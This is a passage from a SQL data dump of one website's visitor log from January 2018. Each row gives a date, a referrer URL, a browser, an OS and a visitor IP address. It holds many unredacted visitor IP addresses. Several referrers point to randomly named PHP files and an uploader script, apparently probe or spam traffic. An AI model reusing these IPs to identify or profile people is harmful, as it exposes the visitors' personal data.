,'','88.198.90.9','000',2,0),(17106,'2018-01-17','http://zphiblgz.org/','Chrome','Windows','59.0.3071.115','','191.190.161.49','000',2,0),(17107,'2018-01-17','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.178','000',2,0),(17108,'2018-01-17','https://zphiblgz.org','Chrome','Macintosh','59.0.3071.115','','192.198.80.227','000',1,0),(17109,'2018-01-17','http://site.ru','Chrome','Windows','5.0.375.99','','185.98.7.210','000',3,0),(17110,'2018-01-17','http://site.ru','Chrome','Windows','5.0.375.99','','186.202.126.98','000',3,0),(17111,'2018-01-18','http://site.ru','Chrome','Windows','5.0.375.99','','108.167.157.107','000',3,0),(17112,'2018-01-18','https://zphiblgz.org/history/','Chrome','Windows','63.0.3239.132','','68.134.61.12','000',8,0),(17113,'2018-01-18','http://site.ru','Chrome','Windows','5.0.375.99','','162.241.244.141','000',1,0),(17114,'2018-01-18','http://site.ru','Chrome','Windows','5.0.375.99','','62.193.39.159','000',5,0),(17115,'2018-01-18','http://site.ru','Chrome','Windows','5.0.375.99','','178.210.90.90','000',1,0),(17116,'2018-01-18','https://zphiblgz.org/','Trident','Unknown','5.0','','180.153.236.125','000',1,0),(17117,'2018-01-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','54.236.1.12','000',1,0),(17118,'2018-01-18','https://zphiblgz.org','Safari','iPad','11.0','','100.36.95.48','000',7,0),(17119,'2018-01-18','http://uptime-as.net/zphiblgz.org','Unknown','Unknown','Unknown','','37.72.175.123','000',1,0),(17120,'2018-01-18','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',1,0),(17121,'2018-01-18','https://zphiblgz.org','Firefox','Windows','40.1','','107.77.97.29','000',1,0),(17122,'2018-01-18','https://zphiblgz.org','Firefox','Windows','40.1','','107.77.205.122','000',1,0),(17123,'2018-01-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1670.zU9Jaxb6m59rGLRaiC5rKe0wG__eHUdjN7xs3cHIXTc.bad7320d1904325513c2eb7e84c8cfb322bd4117&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043bU9rdEVvQ2FoSmVNa2xDQmtNZ25DY3BQMGhWWnliQTNIQXBZbUFUNGtTdyws&sign=879f36e37be1ff8e77693044384fb698&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.226.176.11','000',2,0),(17124,'2018-01-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1670.fhrYVomk1qQtZN76Ss5FY9LcDHEMWRNfIVAChpefRcc.ce25f5f7d54a219277591b4064f647900115a74f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041VkJoSFpDWEdfNGRHTFBXc3gzdGZvc2dtd3B0UjdzMkFOc0o1cFZ3VlhiQSws&sign=3fdfed655eeb1062c59bb8ea6ae7ff74&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.197.137.156','000',2,0),(17125,'2018-01-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1670.CGQr7Xg_KHYFnvSm4xiXGjvz_qS7_B3m17Q96UmNH3Y.c71cafad2126e0d8556d29786cb25ae5e43c863f&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041UlFoRDJqa1IycWMtcnlES1NuTGM3UVNNRUthaEpUOHliUEJJcl83R20yZyws&sign=8ed9e3049dc051bc3ca3dade7b6f90d6&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.18.201','000',2,0),(17126,'2018-01-18','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(17127,'2018-01-18','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1670.rXfJmsqEENwpb_bDbCErVKqqAAL-XXgBxoDI5eODkTE.dbf643d6ad744d019eee17907553bd0325d09b05&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041d1psWnpIU3JiZVFTaFgyTEFhc25TTS1yMW8ta3NKVVVaSFFBbmpiUGJEQSws&sign=0870a3286dc4a6f1b081cf7a6742e3e8&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.178.229','000',2,0),(17128,'2018-01-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',2,0),(17129,'2018-01-18','https://www.google.com/','Firefox','Macintosh','57.0','','100.16.178.46','000',3,0),(17130,'2018-01-18','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.29','000',1,0),(17131,'2018-01-18','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.27','000',1,0),(17132,'2018-01-18','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.27','000',1,0),(17133,'2018-01-18','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.31','000',1,0),(17134,'2018-01-18','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.29','000',1,0),(17135,'2018-01-18','https://zphiblgz.org','Chrome','Macintosh','59.0.3071.86','','192.198.80.227','000',2,0),(17136,'2018-01-18','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(17137,'2018-01-18','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(17138,'2018-01-18','https://zphiblgz.org','Opera','Windows','8.01','','208.80.194.28','000',1,0),(17139,'2018-01-18','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.27','000',1,0),(17140,'2018-01-18','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.27','000',1,0),(17141,'2018-01-18','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','50.225.39.81','000',7,0),(17142,'2018-01-18','https://zphiblgz.org','Safari','Macintosh','11.0.2','','71.179.81.192','000',10,0),(17143,'2018-01-18','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','150.148.14.145','000',3,0),(17144,'2018-01-18','http://www.zphiblgz.org/modules/mod_artuploader/upload.php','Chrome','Windows','42.0.2311.152','','207.244.157.139','000',2,0),(17145,'2018-01-18','https://zphiblgz.org/ts_teams/christy-lewis/','MSIE','Windows','6.0','','41.107.169.202','000',1,0),(17146,'2018-01-18','https://zphiblgz.org','Firefox','Windows','40.1','','153.198.7.142','000',2,0),(17147,'2018-01-18','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','129.2.181.151','000',1,0),(17148,'2018-01-18','https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwi5hIb4jOLYAhXE0FMKHU6mCA4QFggnMAA&url=https%3A%2F%2Fzphiblgz.org%2F&usg=AOvVaw3q4W_LfCjivY3GRWBdIE5d','MSIE','Windows','11.0','','134.192.8.11','000',7,0),(17149,'2018-01-18','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(17150,'2018-01-18','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.27.70.86','000',1,0),(17151,'2018-01-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','212.227.29.211','000',1,0),(17152,'2018-01-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.175.239.7','000',1,0),(17153,'2018-01-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','46.28.105.149','000',1,0),(17154,'2018-01-18','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.32','000',1,0),(17155,'2018-01-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','131.153.37.2','000',1,0),(17156,'2018-01-18','https://zphiblgz.org','Unknown','Unknown','Unknown','','207.47.45.73','000',2,0),(17157,'2018-01-18','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(17158,'2018-01-18','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(17159,'2018-01-18','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.32','000',1,0),(17160,'2018-01-18','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.29','000',1,0),(17161,'2018-01-18','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.29','000',1,0),(17162,'2018-01-18','https://zphiblgz.org','Firefox','Windows','24.0','','207.47.45.73','000',2,0),(17163,'2018-01-18','https://www.google.co.jp/','Chrome','Windows','63.0.3239.132','','126.117.62.154','000',2,0),(17164,'2018-01-18','https://zphiblgz.org','MSIE','Windows','6.0','','146.185.223.202','000',1,0),(17165,'2018-01-18','https://zphiblgz.org','Chrome','Linux','43.0.2371.96','','138.128.46.64','000',2,0),(17166,'2018-01-18','https://zphiblgz.org','Safari','iPhone','11.0','','174.204.6.106','000',6,0),(17167,'2018-01-18','https://zphiblgz.org','Safari','iPhone','11.0','','76.100.200.217','000',2,0),(17168,'2018-01-18','https://zphiblgz.org','Chrome','iPhone','63.0.3239.73','','68.134.39.60','000',5,0),(17169,'2018-01-18','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(17170,'2018-01-18','http://m.facebook.com','AppleWebKit','iPhone','604.4.7','','173.69.157.50','000',1,0),(17171,'2018-01-18','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.30','000',1,0),(17172,'2018-01-18','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(17173,'2018-01-18','http://zphiblgz.org/','MSIE','Windows','11.0','','81.171.58.96','000',1,0),(17174,'2018-01-18','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.30','000',1,0),(17175,'2018-01-18','https://www.google.com/','Firefox','Windows','57.0','','98.166.217.224','000',2,0),(17176,'2018-01-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.27','000',4,0),(17177,'2018-01-19','https://zphiblgz.org','Firefox','Windows','40.1','','120.28.191.3','000',1,0),(17178,'2018-01-19','https://zphiblgz.org','Firefox','Windows','40.1','','180.191.138.172','000',1,0),(17179,'2018-01-19','http://zphiblgz.org/members/wp-includes/Text/acbhahba.php','Chrome','Windows','59.0.3071.115','','184.168.152.165','000',1,0),(17180,'2018-01-19','http://zphiblgz.org/Development/wp-includes/class-wp-post.php','MSIE','Windows','11.0','','184.168.46.209','000',1,0),(17181,'2018-01-19','http://zphiblgz.org/f15600.php','Safari','iPhone','10.0','','97.74.24.214','000',1,0),(17182,'2018-01-19','http://zphiblgz.org/members/wp-includes/ID3/getid3.php','Safari','iPad','10.0','','37.255.128.50','000',1,0),(17183,'2018-01-19','http://zphiblgz.org/wp-content/ngg/modules/photocrati-frame_communication/uivugaoc.php','MSIE','Windows','11.0','','193.231.17.25','000',1,0),(17184,'2018-01-19','http://zphiblgz.org/members/wp-includes/Requests/Auth/Basic.php','Safari','Macintosh','5.1.3','','5.196.74.217','000',1,0),(17185,'2018-01-19','http://zphiblgz.org/members/wp-includes/SimplePie/Cache/DB.php','Firefox','Windows','54.0','','184.168.193.183','000',1,0),(17186,'2018-01-19','http://zphiblgz.org/members/wp-admin/images/xdrntpal.php','Firefox','Windows','43.0','','162.243.23.172','000',1,0),(17187,'2018-01-19','http://zphiblgz.org/development/wp-includes/random_compat/gcsrtnpz.php','Chrome','Windows','27.0.1453.110','','173.201.196.67','000',1,0),(17188,'2018-01-19','http://zphiblgz.org/cache/mod_mainmenu/flunqswo.php','Safari','Macintosh','5.1.3','','178.210.90.90','000',1,0),(17189,'2018-01-19','http://zphiblgz.org/development/wp-admin/css/colors/ddlcpune.php','Safari','iPad','10.0','','87.242.64.229','000',1,0),(17190,'2018-01-19','https://zphiblgz.org','Safari','Macintosh','11.0.1','','52.176.2.229','000',1,0),(17191,'2018-01-19','https://zphiblgz.org','Opera Next','Windows','46.0.2597.32','','192.198.80.227','000',1,0),(17192,'2018-01-19','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',2,0),(17193,'2018-01-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1671.UOdBDDAMJVzcMqOQkdhI5FjJ-3FA5ZXUdKyR1ECM1_8.a8c83c6fb31d299e6c6af6d781bc62d1cc7bee88&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042Ukx6YzNOeWhkZjlINzBkcTdLcFBubURqaHVtb3VkYTBEQjdLQndOTFd3dyws&sign=2a469d0b0a2a270e2ba883190a7129da&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','165.227.33.253','000',2,0),(17194,'2018-01-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1671.A5-rK0CfKbXuchLIzGd4t4oB-VnSelyvwvvmKltAoqg.4f2a680fb5a76fab95ba039d1ac09bc0dfa16533&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043WHhERlJ6ZzY1MDFRTUphQUlSMDU0NURVeVFJa2lSR2dTZk8zNlhGR3FSZyws&sign=a3dc029edf1dc02717ce1351dc375572&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.210.9','000',2,0),(17195,'2018-01-19','https://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1671.Wzd5BWwV_nCAMe_3SnuYCiAhyaG6kWxyu7T4x6_n-TY.efd0d3cede11e2698456c813dd404bad638295d9&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041VGcxLVlSdnF6SVFKd3p5NXJHbmhGMmQ1S2JIc3BNYXVnZ0VCSVU1NWtUdyws&sign=64d1eedee84ea4a0b248d7f752e832bd&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.150.162','000',2,0),(17196,'2018-01-19','https://www.google.com/','Chrome','Windows','63.0.3239.132','','69.67.85.196','000',2,0),(17197,'2018-01-19','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','150.148.14.145','000',3,0),(17198,'2018-01-19','https://zphiblgz.org','Safari','iPhone','11.0','','198.204.189.245','000',2,0),(17199,'2018-01-19','https://zphiblgz.org','Firefox','Windows','40.1','','66.192.216.218','000',2,0),(17200,'2018-01-19','https://zphiblgz.org','Edge','Windows','16.16299','','96.255.188.197','000',4,0),(17201,'2018-01-19','https://zphiblgz.org','Firefox','Windows','34.0','','194.28.115.252','000',1,0),(17202,'2018-01-19','https://search.yahoo.com/','Chrome','Windows','63.0.3239.132','','69.195.247.116','000',5,0),(17203,'2018-01-19','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','214.36.0.135','000',1,0),(17204,'2018-01-19','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','214.36.6.26','000',2,0),(17205,'2018-01-19','https://zphiblgz.org','Firefox','Windows','40.1','','125.160.42.163','000',2,0),(17206,'2018-01-19','http://zphiblgz.org/scholarship/','Chrome','iPhone','63.0.3239.73','','68.134.39.60','000',2,0),(17207,'2018-01-19','https://zphiblgz.org','Chrome','Macintosh','27.0.1453.93','','78.46.156.169','000',1,0),(17208,'2018-01-19','(null)','Firefox','Windows','33.0','','162.243.69.215','000',1,0),(17209,'2018-01-19','https://zphiblgz.org','Safari','iPhone','11.0','','71.179.166.197','000',3,0),(17210,'2018-01-19','https://zphiblgz.org','Edge','Windows','16.16299','','68.134.254.57','000',11,0),(17211,'2018-01-19','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','129.2.181.151','000',4,0),(17212,'2018-01-19','android-app://com.google.android.gm','Chrome','Android','60.0.3112.116','','174.205.0.113','000',2,0),(17213,'2018-01-19','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.29','000',1,0),(17214,'2018-01-19','https://zphiblgz.org','Chrome','Macintosh','49.0.2623.87','','104.129.192.79','000',2,0),(17215,'2018-01-19','https://www.google.com/','Firefox','Windows','57.0','','198.51.197.42','000',3,0),(17216,'2018-01-19','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(17217,'2018-01-19','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',4,0),(17218,'2018-01-19','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.35','000',1,0),(17219,'2018-01-19','https://www.google.com/','Chrome','Windows','63.0.3239.132','','163.230.250.202','000',2,0),(17220,'2018-01-19','https://zphiblgz.org','redback','Unknown','v0','','109.236.8.10','000',4,0),(17221,'2018-01-19','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.35','000',1,0),(17222,'2018-01-19','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(17223,'2018-01-19','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(17224,'2018-01-19','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',1,0),(17225,'2018-01-19','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',4,0),(17226,'2018-01-19','https://zphiblgz.org','Chrome','Windows','14.0.835.187','','208.80.194.35','000',1,0),(17227,'2018-01-19','https://zphiblgz.org','MSIE','Windows','11.0','','34.209.175.228','000',2,0),(17228,'2018-01-19','http://zphiblgz.org','Firefox','Macintosh','54.0','','82.177.224.113','000',3,0),(17229,'2018-01-19','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.23','000',2,0),(17230,'2018-01-19','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.55.41','000',1,0),(17231,'2018-01-20','https://zphiblgz.org','Safari','iPhone','7.0','','131.253.25.157','000',1,0),(17232,'2018-01-20','https://search.yahoo.com/','Chrome','Windows','63.0.3239.132','','100.16.161.86','000',8,0),(17233,'2018-01-20','https://zphiblgz.org','AppleWebKit','Windows','534','','199.30.24.188','000',1,0),(17234,'2018-01-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',2,0),(17235,'2018-01-20','http://uptime-as.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.134','000',1,0),(17236,'2018-01-20','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.152','000',1,0),(17237,'2018-01-20','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1672.PMPILyQS4VxPpNTDVKzqhGcIV5HuYMIIlHMiqxMiHD2WqoPohx73H9q8rePriVS_.b2ec0cee7ccd00c82b3b31ff17dce852156945fe&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGftRg9cP1erjBfVTUcXDXk&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWSmdzTXozRlNuWUxaWklsQXdVNnF4T0lfYTQ3TW5hQ3ZhTDZMeXVoVzRwTXNvODltZjhoM1Y1S3dEVjgtc09raGpQZEl4RUpDWGRpQQ&b64e=2&sign=37dd1841daeab991dd1b2e01af80932c&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96F2fK1f-BTz0lIQYbchzTN4q3RKUzaP1pTy1LEF5hvuMK5fGFJsdwjQAJKcl9jCpmygquzyFUDlpYrbVGnxD9pzr44SclFqB_5xCPBb0mG2BRJiRGDGNl2ng&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCW5ri5MzTNSEgHSv8BEwMh8Tps-haLY-uITdnFxdYxZF06GbyzwkerE_o-0Ufgmk5ezfZUT-DZo9g&l10n=ru&cts=1516448698013&mc=3.71250616759','MSIE','Windows','8.0','','128.72.151.219','000',1,0),(17238,'2018-01-20','https://zphiblgz.org','Firefox','Windows','34.0','','194.28.115.252','000',1,0),(17239,'2018-01-20','https://zphiblgz.org','Chrome','Linux','26.0.1410.63','','80.211.152.242','000',1,0),(17240,'2018-01-20','https://zphiblgz.org','Firefox','Windows','40.1','','187.169.250.174','000',2,0),(17241,'2018-01-20','https://zphiblgz.org','Firefox','Windows','53.0','','184.94.240.92','000',2,0),(17242,'2018-01-20','https://www.google.com/','Safari','iPhone','11.0','','68.134.29.69','000',2,0),(17243,'2018-01-20','https://zphiblgz.org','Firefox','Macintosh','3.6.11','','208.80.194.29','000',1,0),(17244,'2018-01-20','https://zphiblgz.org/','Safari','iPhone','11.0','','107.77.202.182','000',3,0),(17245,'2018-01-20','https://zphiblgz.org','Safari','iPhone','11.0','','108.18.105.152','000',3,0),(17246,'2018-01-20','https://zphiblgz.org','HTTPClient','Unknown','1.0','','54.204.222.218','000',3,0),(17247,'2018-01-20','http://www.google.com/','Chrome','Android','63.0.3239.111','','107.77.249.9','000',2,0),(17248,'2018-01-20','https://zphiblgz.org','HTTPClient','Unknown','1.0','','54.159.214.157','000',2,0),(17249,'2018-01-20','https://www.google.com/','Safari','Macintosh','11.0.2','','192.12.13.14','000',2,0),(17250,'2018-01-20','https://zphiblgz.org','Firefox','Linux','24.0','','100.36.135.142','000',6,0),(17251,'2018-01-20','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','99.203.16.183','000',6,0),(17252,'2018-01-20','https://zphiblgz.org','HTTPClient','Unknown','1.0','','54.224.147.167','000',1,0),(17253,'2018-01-20','https://zphiblgz.org','Firefox','Windows','40.1','','103.10.23.156','000',2,0),(17254,'2018-01-20','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1672.WjoacmGvmSs3LIN1Kko0LX4RXirc6ifWVdYh_tJzwWX_lifZpoiKQkF-9BgN8DRo.538f3ae57a421d85fb6211fb782423693d61ecc7&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YGHEttDsYq_w3pSJtejupWg&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIVVhHeGJaUXZlOTBPNTJrSEN0dU0wRWh4YmFTLWhaWXc5aFBwS0JSS0lFRGpOX0wzVDhaS19OclBDcWhEcVcyWXZZWFppeDkxSUxjNmhocVVpaFpHQTItamRvNVl5U1ZsREh2RDd0SnVIb1J4OFZUYTE3amdsaA&b64e=2&sign=6f3cc589cbde52ab5ddacc4aae8f4076&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FsKotGubj_YCTyTPF7DDZxWWJyYXnz075silaCcyvMGKINniSgXBJVynuLv8jaEc2kRAvJZ1TVnLKq5upKiosnOAUBXG-v2EBh4lzTOVO8aZnJjc176e-4H1ZVOZ2dF5N&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXboeqr305aILd-bOMWngOpXI-0yUU1regmBpbaq7ZShfXFHqBbeV7YS8DjtthesniWOD66iwS77w&l10n=ru&cts=1516464972394&mc=2.15261239619','MSIE','Windows','8.0','','46.188.42.180','000',1,0),(17255,'2018-01-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.102.7.216','000',2,0),(17256,'2018-01-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.102.7.150','000',1,0),(17257,'2018-01-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.102.7.148','000',1,0),(17258,'2018-01-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.192.91.157','000',2,0),(17259,'2018-01-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.192.95.110','000',63,0),(17260,'2018-01-20','https://zphiblgz.org','Chrome','Windows','10.0.648.133','','208.80.194.32','000',2,0),(17261,'2018-01-20','https://zphiblgz.org','Firefox','Windows','5.0','','208.80.194.32','000',1,0),(17262,'2018-01-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.97.137.44','000',29,0),(17263,'2018-01-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.192.95.98','000',68,0),(17264,'2018-01-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','50.97.137.43','000',46,0),(17265,'2018-01-20','https://zphiblgz.org','Chrome','Chrome OS','63.0.3239.140','','174.205.4.80','000',2,0),(17266,'2018-01-20','https://zphiblgz.org','SamsungBrowser','Android','6.2','','166.137.240.57','000',1,0),(17267,'2018-01-20','https://zphiblgz.org','SamsungBrowser','Android','6.2','','107.77.202.23','000',4,0),(17268,'2018-01-20','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',1,0),(17269,'2018-01-20','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.106','000',1,0),(17270,'2018-01-20','http://zphiblgz.org/','Chrome','Macintosh','59.0.3071.115','','177.33.209.113','000',1,0),(17271,'2018-01-20','https://zphiblgz.org','Chrome','Macintosh','59.0.3071.115','','192.198.80.227','000',1,0),(17272,'2018-01-20','https://zphiblgz.org','Chrome','Linux','59.0.3071.109','','192.198.80.227','000',2,0),(17273,'2018-01-20','https://zphiblgz.org','Apache-HttpClient','Unknown','UNAVAILABLE','','98.233.74.2','000',1,0),(17274,'2018-01-20','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','98.233.74.2','000',2,0),(17275,'2018-01-20','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.27','000',1,0),(17276,'2018-01-20','https://zphiblgz.org/','SamsungBrowser','Android','6.2','','73.135.240.26','000',2,0),(17277,'2018-01-20','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','73.128.239.206','000',2,0),(17278,'2018-01-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(17279,'2018-01-20','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.32','000',1,0),(17280,'2018-01-20','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(17281,'2018-01-20','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','96.234.210.118','000',8,0),(17282,'2018-01-20','https://zphiblgz.org','Firefox','Windows','54.0','','96.234.210.118','000',2,0),(17283,'2018-01-20','https://t.co/dozk3WHLgh','Safari','Macintosh','9.1.3','','71.244.250.212','000',4,0),(17284,'2018-01-20','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.32','000',1,0),(17285,'2018-01-20','https://zphiblgz.org','Chrome','Macintosh','39.0.833.0','','185.100.84.82','000',1,0),(17286,'2018-01-20','https://zphiblgz.org','Safari','Windows','5.0.2','','213.233.57.134','000',1,0),(17287,'2018-01-20','https://zphiblgz.org','Firefox','Macintosh','37.0','','181.112.61.178','000',1,0),(17288,'2018-01-20','https://zphiblgz.org','Firefox','Linux','36.0','','88.204.214.122','000',1,0),(17289,'2018-01-20','https://zphiblgz.org','Firefox','Macintosh','37.0','','145.239.77.20','000',1,0),(17290,'2018-01-20','https://zphiblgz.org','Firefox','Windows','36.0','','219.85.63.166','000',1,0),(17291,'2018-01-20','https://zphiblgz.org','MSIE','Windows','9.0','','136.243.16.43','000',1,0),(17292,'2018-01-20','https://zphiblgz.org','Opera','Windows','12.00','','185.93.3.123','000',1,0),(17293,'2018-01-20','https://zphiblgz.org','MSIE','Windows','11.0','','71.191.75.67','000',1,0),(17294,'2018-01-20','https://zphiblgz.org','HTTPClient','Unknown','1.0','','54.226.80.54','000',1,0),(17295,'2018-01-20','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(17296,'2018-01-20','https://zphiblgz.org','Safari','iPhone','7.0','','199.30.24.79','000',1,0),(17297,'2018-01-20','https://email19.godaddy.com/webmail.php','Chrome','Windows','63.0.3239.132','','91.140.161.9','000',5,0),(17298,'2018-01-20','https://zphiblgz.org','MSIE','Windows','8.0','','50.112.194.65','000',2,0),(17299,'2018-01-20','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1673.yrlLysD1TXr9rnmNwEN0WGyyQlmUMmdJNnnD3npbDY5Mx0vMzsE9bLAeb5V8HhBb.0505e7ddac14696f0319de8865d186b0b67ef937&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0